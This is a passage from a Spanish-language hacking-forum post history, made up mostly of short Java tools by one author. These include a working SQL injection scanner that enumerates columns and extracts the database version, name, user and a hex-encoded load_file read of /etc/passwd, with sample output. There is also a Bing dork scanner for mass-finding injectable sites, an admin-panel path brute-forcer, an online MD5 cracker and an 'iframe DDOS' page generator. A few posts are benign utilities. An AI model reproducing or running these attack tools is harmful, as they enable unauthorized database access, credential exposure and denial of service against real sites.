            urlfinal = "";
            formariny = "";

            for (x = 1; x <= 5; x = x + 1) {

//urlfinal = urlfinal+x+",";
                urlfinal = urlfinal + encodehex("RATSXPDOWN" + x) + ",";
                formariny = formariny + x + ",";

                otrofinal = urlfinal;
                otroformar = formariny;

                otrofinal = otrofinal.substring(0, otrofinal.length() - 1);
                otroformar = otroformar.substring(0, otroformar.length() - 1);

                code = toma(target + "-1+union+select+" + otrofinal);

                uno = Pattern.compile("RATSXPDOWN(\\d+)");
                dos = uno.matcher(code);

                if (dos.find()) {

                    otroformar = otroformar.replace(dos.group(1), "hackman");

                    link = target + "-1+union+select+" + otroformar;

                    System.out.println("[Target] : " + link);
                    System.out.println("[Limit] : The site has " + x + " columns");
                    System.out.println("[Data] : The number " + dos.group(1) + " print data");

                    savefile("logs-scansql.txt", "[Target] : " + link);
                    savefile("logs-scansql.txt", "[Limit] : The site has " + x + " columns");
                    savefile("logs-scansql.txt", "[Data] : The number " + dos.group(1) + " print data");

                    System.out.println("\n[+] Searching informaion ...\n");

                    details(link);

                    System.out.println("\n[+] Finished");

                    System.out.println("\n-- == Coded By Doddy H == --");

                    savefile("logs-scansql.txt", "\n-----------------\n");

                    System.exit(1);

                }

            }
            System.out.println("[-] Error");
        } else {
            System.out.println("[-] Not vulnerable");
        }

    }

    private static void details(String urla) throws Exception {

        String concat;
        String code;

        Pattern uno = null;
        Matcher dos = null;

        concat = "concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))";

        urla = urla.replace("hackman", concat);

        code = toma(urla);

        uno = Pattern.compile("ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854");
        dos = uno.matcher(code);

        if (dos.find()) {
            System.out.println("[+] DB Version : " + dos.group(1));
            System.out.println("[+] DB Name : " + dos.group(2));
            System.out.println("[+] Username : " + dos.group(3));

            savefile("logs-scansql.txt", "[+] DB Version : " + dos.group(1));
            savefile("logs-scansql.txt", "[+] DB Name : " + dos.group(2));
            savefile("logs-scansql.txt", "[+] Username : " + dos.group(3));

        } else {
            System.out.println("[-] Not found any data");
        }

        urla = urla.replace(concat, "char(69,82,84,79,82,56,53,52)");

        code = toma(urla + "+from+information_schema.tables--");
        uno = Pattern.compile("ERTOR854");
        dos = uno.matcher(code);

        if (dos.find()) {
            System.out.println("[+] information_schema : on");
            savefile("logs-scansql.txt", "[+] information_schema : on");
        } else {
            System.out.println("[-] information_schema : off");
        }

        code = toma(urla + "+from+mysql.user--");
        uno = Pattern.compile("ERTOR854");
        dos = uno.matcher(code);

        if (dos.find()) {
            System.out.println("[+] mysqluser : on");
            savefile("logs-scansql.txt", "[+] mysqluser : on");
        } else {
            System.out.println("[-] mysquser : off");
        }

        urla = urla.replace("char(69,82,84,79,82,56,53,52)", "concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))");

//ystem.out.print(urla);

        code = toma(urla);
        uno = Pattern.compile("ERTOR854");
        dos = uno.matcher(code);

        if (dos.find()) {
            System.out.println("[-] load_file : on");
            savefile("logs-scansql.txt", "[-] load_file : on");
        } else {
            System.out.println("[-] load_file : off");
        }

    }

    private static void savefile(String nombre, String texto) throws Exception {

        FileWriter writer = new FileWriter(nombre, true);
        writer.write(texto + "\r\n");
        writer.close();

    }

    private static String toma(String urla) throws Exception {

        String re;

        StringBuffer conte = new StringBuffer(40);

        URL url = new URL(urla);
        URLConnection hc = url.openConnection();
        hc.setRequestProperty("User-Agent", "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");

        BufferedReader nave = new BufferedReader(
                new InputStreamReader(hc.getInputStream()));

        while ((re = nave.readLine()) != null) {
            conte.append(re);
        }

        nave.close();

        return conte.toString();

    }

    public static String encodehex(String text) {

//Thanks to Katarina Majetic
//Based on http://www.dzone.com/snippets/encode-string-hex

        byte[] z = text.getBytes();
        StringBuffer h = new StringBuffer();
        String l;
        int n;
        int a = z.length;
        int u;

        for (n = 0; n < a; n++) {
            u = z[n] & 0x000000FF;
            l = Integer.toHexString(u);
            h.append(l);
        }
        return "0x" + h.toString();
    }
}

//The End ?

Ejemplo de uso

Código [Seleccionar]



-- == SQL Scanner 0.1 == --


[+] Page :
http://localhost/sql.php?id=

[+] Checking ...

[+] Scanning ...

[Target] : http://localhost/sql.php?id=-1+union+select+hackman,2,3
[Limit] : The site has 3 columns
[Data] : The number 1 print data

[+] Searching informaion ...

[+] DB Version : 5.5.20-log
[+] DB Name : hackman
[+] Username : root@localhost
[+] information_schema : on
[+] mysqluser : on
[-] load_file : off

[+] Finished

-- == Coded By Doddy H == --

#254

Java / [Java] BingHack Tool 0.1

13 Enero 2013, 03:39 AM

Un simple programa para buscar en Bing paginas vulnerables a SQLI.

Código (java) [Seleccionar]


//
//BingHack Tool 0.1
//Coded By Doddy H
//

import java.util.Scanner;
import java.io.*;
import java.net.*;

import java.util.regex.Matcher;
import java.util.regex.Pattern;

public class Main {

    public static void main(String[] args) throws Exception {

        String code;
        String tar;
        int x;
        String dork;
        int counte;
        String urlfinal;

        Pattern uno = null;
        Matcher dos = null;

        Scanner host = new Scanner(System.in);
        System.out.println("\n\n-- == BingHack Tool 0.1 == --\n\n");
        System.out.println("[+] Dork : ");
        dork = host.nextLine();

        System.out.println("[+] Count : ");
        counte = host.nextInt();

        System.out.println("\n[+] Searching ...\n");

        for (x = 10; x <= counte; x = x + 10) {

            code = toma("http://www.bing.com/search?q=" + dork + "&first=" + x);

            uno = Pattern.compile("<h3><a href=\"(.*?)\"");
            dos = uno.matcher(code);

            while (dos.find()) {

                urlfinal = cortar(dos.group(1));

                sql(urlfinal);

            }

        }

        System.out.println("\n[+] Finished");
        System.out.println("\n-- == Coded By Doddy H == --");

    }

    private static void savefile(String nombre, String texto) throws Exception {

        FileWriter writer = new FileWriter(nombre, true);
        writer.write(texto + "\r\n");
        writer.close();

    }

    private static void sql(String urla) throws Exception {

        String code;
        String mostrar;

        Pattern uno = null;
        Matcher dos = null;

        mostrar = urla + "-1+union+select+666--";

        try {
            code = toma(mostrar);

            uno = Pattern.compile("The used SELECT statements have a different number of columns");
            dos = uno.matcher(code);

            if (dos.find()) {
                System.out.println("[+] SQLI : " + urla);
                savefile("sql-logs.txt", urla);
            }

        } catch (Exception ex) {
        }

    }

    private static String cortar(String urla) throws Exception {

        Pattern uno = null;
        Matcher dos = null;

        uno = Pattern.compile("(.*)=(.*)");
        dos = uno.matcher(urla);

        if (dos.find()) {

            return (dos.group(1) + "=");
        } else {
            return "no tengo idea xDD";
        }

    }

    private static String toma(String urla) throws Exception {

        String re;

        StringBuffer conte = new StringBuffer(40);

        URL url = new URL(urla);
        URLConnection hc = url.openConnection();
        hc.setRequestProperty("User-Agent", "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");

        BufferedReader nave = new BufferedReader(
                new InputStreamReader(hc.getInputStream()));

        while ((re = nave.readLine()) != null) {
            conte.append(re);
        }

        nave.close();

        return conte.toString();

    }
}

//The End ?

#255

Java / [Java] LocateIP 0.1

13 Enero 2013, 03:39 AM

Un simple programa para buscar la localizacion de una IP.

Código (java) [Seleccionar]


//LocateIP 0.1
//Coded By Doddy H

import java.util.Scanner;
import java.io.*;
import java.net.*;

import java.util.regex.Matcher;
import java.util.regex.Pattern;

public class Main {

    public static void main(String[] args) throws Exception {

        String ip;
        Scanner host = new Scanner(System.in);
        System.out.println("\n\n-- == LocateIP 0.1 == --\n\n");
        System.out.println("[+] IP : ");
        ip = host.nextLine();

        String code;

        code = toma("http://www.melissadata.com/lookups/iplocation.asp?ipaddress=" + ip);

        Pattern uno = null;
        Matcher dos = null;

        uno = Pattern.compile("City</td><td align=(.*?)><b>(.*?)</b></td>");
        dos = uno.matcher(code);

        if (!dos.find()) {
            System.out.println("[+] City : Not Found");
        } else {
            System.out.println("[+] City : " + dos.group(2));
        }

        uno = Pattern.compile("Country</td><td align=(.*?)><b>(.*?)</b></td>");
        dos = uno.matcher(code);

        if (!dos.find()) {
            System.out.println("[+] Country : Not Found");
        } else {
            System.out.println("[+] Country : " + dos.group(2));
        }

        uno = Pattern.compile("State or Region</td><td align=(.*?)><b>(.*?)</b></td>");
        dos = uno.matcher(code);

        if (!dos.find()) {
            System.out.println("[+] State or Region : Not Found");
        } else {
            System.out.println("[+] State or Region : " + dos.group(2));
        }

//code = toma("http://www.ip-adress.com/reverse_ip/178.33.230.100");

//uno = Pattern.compile("/whois/(.*?)\">Whois");
//dos = uno.matcher(code);

//while(dos.find()) {
//System.out.println("[+] DNS : "+dos.group(1));
//}

        System.out.println("\n\n-- == Coded By Doddy H == --");

    }

    private static String toma(String urla) throws Exception {

        String re;

        StringBuffer conte = new StringBuffer(40);

        URL url = new URL(urla);
        URLConnection hc = url.openConnection();
        hc.setRequestProperty("User-Agent", "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");

        BufferedReader nave = new BufferedReader(
                new InputStreamReader(hc.getInputStream()));

        while ((re = nave.readLine()) != null) {
            conte.append(re);
        }

        nave.close();

        return conte.toString();

    }
}

// The End ?

#256

Java / [Java] PanelFinder 0.1

13 Enero 2013, 03:39 AM

Un simple programa para buscar el famoso panel de administracion en una pagina.

Código (java) [Seleccionar]


//PanelFinder 0.1
//Coded By Doddy H

import java.util.Scanner;
import java.net.URL;

public class Main {

    public static void main(String[] args) {

        String[] paneles = {
            "admin/admin.asp", "admin/login.asp", "admin/index.asp", "admin/admin.aspx", "admin/login.aspx", "admin/index.aspx", "admin/webmaster.asp", "admin/webmaster.aspx", "asp/admin/index.asp", "asp/admin/index.aspx", "asp/admin/admin.asp", "asp/admin/admin.aspx", "asp/admin/webmaster.asp", "asp/admin/webmaster.aspx", "admin/", "login.asp", "login.aspx", "admin.asp", "admin.aspx", "webmaster.aspx", "webmaster.asp", "login/index.asp", "login/index.aspx", "login/login.asp", "login/login.aspx", "login/admin.asp", "login/admin.aspx", "administracion/index.asp", "administracion/index.aspx", "administracion/login.asp", "administracion/login.aspx", "administracion/webmaster.asp", "administracion/webmaster.aspx", "administracion/admin.asp", "administracion/admin.aspx", "php/admin/", "admin/admin.php", "admin/index.php", "admin/login.php", "admin/system.php", "admin/ingresar.php", "admin/administrador.php", "admin/default.php", "administracion/", "administracion/index.php", "administracion/login.php", "administracion/ingresar.php", "administracion/admin.php", "administration/", "administration/index.php", "administration/login.php", "administrator/index.php", "administrator/login.php", "administrator/system.php", "system/", "system/login.php", "admin.php", "login.php", "administrador.php", "administration.php", "administrator.php", "admin1.html", "admin1.php", "admin2.php", "admin2.html", "yonetim.php", "yonetim.html", "yonetici.php", "yonetici.html", "adm/", "admin/account.php", "admin/account.html", "admin/index.html", "admin/login.html", "admin/home.php", "admin/controlpanel.html", "admin/controlpanel.php", "admin.html", "admin/cp.php", "admin/cp.html", "cp.php", "cp.html", "administrator/", "administrator/index.html", "administrator/login.html", "administrator/account.html", "administrator/account.php", "administrator.html", "login.html", "modelsearch/login.php", "moderator.php", "moderator.html", "moderator/login.php", "moderator/login.html", "moderator/admin.php", "moderator/admin.html", "moderator/", "account.php", "account.html", "controlpanel/", "controlpanel.php", "controlpanel.html", "admincontrol.php", "admincontrol.html", "adminpanel.php", "adminpanel.html", "admin1.asp", "admin2.asp", "yonetim.asp", "yonetici.asp", "admin/account.asp", "admin/home.asp", "admin/controlpanel.asp", "admin/cp.asp", "cp.asp", "administrator/index.asp", "administrator/login.asp", "administrator/account.asp", "administrator.asp", "modelsearch/login.asp", "moderator.asp", "moderator/login.asp", "moderator/admin.asp", "account.asp", "controlpanel.asp", "admincontrol.asp", "adminpanel.asp", "fileadmin/", "fileadmin.php", "fileadmin.asp", "fileadmin.html", "administration.html", "sysadmin.php", "sysadmin.html", "phpmyadmin/", "myadmin/", "sysadmin.asp", "sysadmin/", "ur-admin.asp", "ur-admin.php", "ur-admin.html", "ur-admin/", "Server.php", "Server.html", "Server.asp", "Server/", "wp-admin/", "administr8.php", "administr8.html", "administr8/", "administr8.asp", "webadmin/", "webadmin.php", "webadmin.asp", "webadmin.html", "administratie/", "admins/", "admins.php", "admins.asp", "admins.html", "administrivia/", "Database_Administration/", "WebAdmin/", "useradmin/", "sysadmins/", "admin1/", "system-administration/", "administrators/", "pgadmin/", "directadmin/", "staradmin/", "ServerAdministrator/", "SysAdmin/", "administer/", "LiveUser_Admin/", "sys-admin/", "typo3/", "panel/", "cpanel/", "cPanel/", "cpanel_file/", "platz_login/", "rcLogin/", "blogindex/", "formslogin/", "project-admins/", "phppgadmin/", "pureadmin/", "sql-admin/", "radmind/", "openvpnadmin/", "wizmysqladmin/", "vadmind/", "ezsqliteadmin/", "hpwebjetadmin/", "newsadmin/", "adminpro/", "Lotus_Domino_Admin/", "bbadmin/", "vmailadmin/", "Indy_admin/", "ccp14admin/", "irc-macadmin/", "banneradmin/", "sshadmin/", "phpldapadmin/", "macadmin/", "administratoraccounts/", "admin4_account/", "admin4_colon/", "radmind-1/", "Super-Admin/", "AdminTools/", "cmsadmin/", "SysAdmin2/", "globes_admin/", "cadmins/", "phpSQLiteAdmin/", "navSiteAdmin/", "server_admin_small/", "logo_sysadmin/", "server/", "database_administration/", "power_user/", "system_administration/", "ss_vms_admin_sm/"};

        String target;
        String ur;

        Scanner host = new Scanner(System.in);
        System.out.println("\n\n-- == PanelFinder 0.1 == --\n\n");
        System.out.println("[+] URL : ");
        target = host.nextLine();

        System.out.println("\n[+] Scanning ...\n");

        for (int count = 0; count < paneles.length; count++) {

            ur = target + "/" + paneles[count];

            try {

                URL u = new URL(ur);

                Object o = u.getContent();
                System.out.println("[+] Link : " + ur);
            } catch (Exception ex) {
            }

        }

        System.out.println("\n[+] Finished\n");
        System.out.println("-- == Coded By Doddy H == --");

    }
}

//The End ?

#257

Java / [Java] CrackHash 0.1

13 Enero 2013, 03:38 AM

Un simple programa para crackear un hash md5 mediante una pagina online.

Código (java) [Seleccionar]


//
//CrackHash 0.1
//Coded By Doddy H
//
//Test with 098f6bcd4621d373cade4e832627b4f6
//
//

import java.util.Scanner;
import java.io.*;
import java.net.*;

import java.util.regex.Matcher;
import java.util.regex.Pattern;

public class Main {

    public static void main(String[] args) throws Exception {

        String hash;
        Scanner host = new Scanner(System.in);
        System.out.println("\n\n-- == CrackHash 0.1 == --\n\n");
        System.out.println("[+] Hash : ");
        hash = host.nextLine();

        String code;

        code = toma("http://md5.hashcracking.com/search.php?md5=" + hash);

        Pattern uno = null;
        Matcher dos = null;

        uno = Pattern.compile("Cleartext of (.*) is (.*)");
        dos = uno.matcher(code);

        if (!dos.find()) {
            System.out.println("\n[-] Not Found");
        } else {
            System.out.println("\n[+] Hash Cracked : " + dos.group(2));
        }

        System.out.println("\n\n-- == Coded By Doddy H == --");

    }

    private static String toma(String urla) throws Exception {

        String re;

        StringBuffer conte = new StringBuffer(40);

        URL url = new URL(urla);
        URLConnection hc = url.openConnection();
        hc.setRequestProperty("User-Agent", "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");

        BufferedReader nave = new BufferedReader(
                new InputStreamReader(hc.getInputStream()));

        while ((re = nave.readLine()) != null) {
            conte.append(re);
        }

        nave.close();

        return conte.toString();

    }
}

//The End ?

#258

Java / [Java] URL Shorter 0.1

12 Enero 2013, 03:11 AM

Un simple programa para cortar urls.

Código (java) [Seleccionar]


/**
 * URL Shorter 0.1
 * Coded By Doddy H
 */

import java.util.Scanner;
import java.net.*;
import java.io.*;

public class Main {
    public static void main(String[] args) throws Exception {
        
      String pagina;
      String re;
      
      Scanner host = new Scanner(System.in);
      System.out.println("\n\n-- == URL Shorter 0.1 == --\n\n");
      System.out.println("[+] Page : ");
      pagina = host.nextLine();

      URL cargar = new URL("http://tinyurl.com/api-create.php?url="+pagina);
      BufferedReader nave = new BufferedReader(
      new InputStreamReader(cargar.openStream()));

      while ((re = nave.readLine()) != null)
        System.out.println("\n[+] Link : "+re);
      nave.close();
   
      System.out.println("\n\n-- == Coded By Doddy H == --");
    }
}

/**
 * The End ? 
 */

#259

Java / [Java] Iframe DDOS

12 Enero 2013, 03:11 AM

Un simple poc para iframe ddos.

Código (java) [Seleccionar]


/**
 * Iframe DDOS 0.1
 * Coded By Doddy H
 */

import java.util.Scanner;
import java.net.*;
import java.io.*;

public class Main {
    public static void main(String[] args) throws IOException{

      String pagina;
      int cantidad;
      int y;

      FileOutputStream fos;
      DataOutputStream dos;

      Scanner host = new Scanner(System.in);
      System.out.println("\n\n-- == Iframe DDOS 0.1 == --\n\n");
      System.out.println("[+] Page : ");
      pagina = host.nextLine();
      System.out.println("[+] Count : ");
      cantidad = host.nextInt();

      FileWriter ar=new FileWriter("poc.html");
      BufferedWriter go=new BufferedWriter(ar);
      PrintWriter archivo=new PrintWriter(go);

      for (y=1;y<=cantidad;y++){
        archivo.println("<iframe src='"+pagina+"' width='3' height='3'></iframe><br>");
      }
      archivo.close();
      System.out.println("\n[+] All done ...");
      System.out.println("\n\n-- == Coded By Doddy H == --");
    }
}

/**
 * The End ?
 */

#260

Scripting / El script navideño

24 Diciembre 2012, 14:56 PM

Ja , como regalo de navidad les dejo el script navideño xDDD.

El codigo

Código (perl) [Seleccionar]


#!usr/bin/perl
#El script navideño
#Coded By Doddy H

while(true) {

my($dia,$mes,$año,$hora,$minutos,$segundos) = agarrate_la_hora();

unless($dia eq "25" and $mes eq "12") {
syswrite STDOUT,"[+] Fecha y hora : $dia/$mes/$año $hora:$minutos:$segundos \r";
} else {
syswrite STDOUT,"\n\n[+] Feliz navidad !";
<stdin>;
exit(1); 
}

}

sub agarrate_la_hora {

my ($a,$b,$c,$d,$e,$f,$g,$h,$i) = localtime(time);

$f+= 1900;
$e++;

return($d,$e,$f,$c,$b,$a);

}

#The End ?

Test Foro de elhacker.net SMF 2.1

Mensajes - BigBear

Java / [Java] SQLI Scanner 0.2

Java / Re: [Java] SQL Scanner 0.1

Java / [Java] SQL Scanner 0.1

Java / [Java] BingHack Tool 0.1

Java / [Java] LocateIP 0.1

Java / [Java] PanelFinder 0.1

Java / [Java] CrackHash 0.1

Java / [Java] URL Shorter 0.1

Java / [Java] Iframe DDOS

Scripting / El script navideño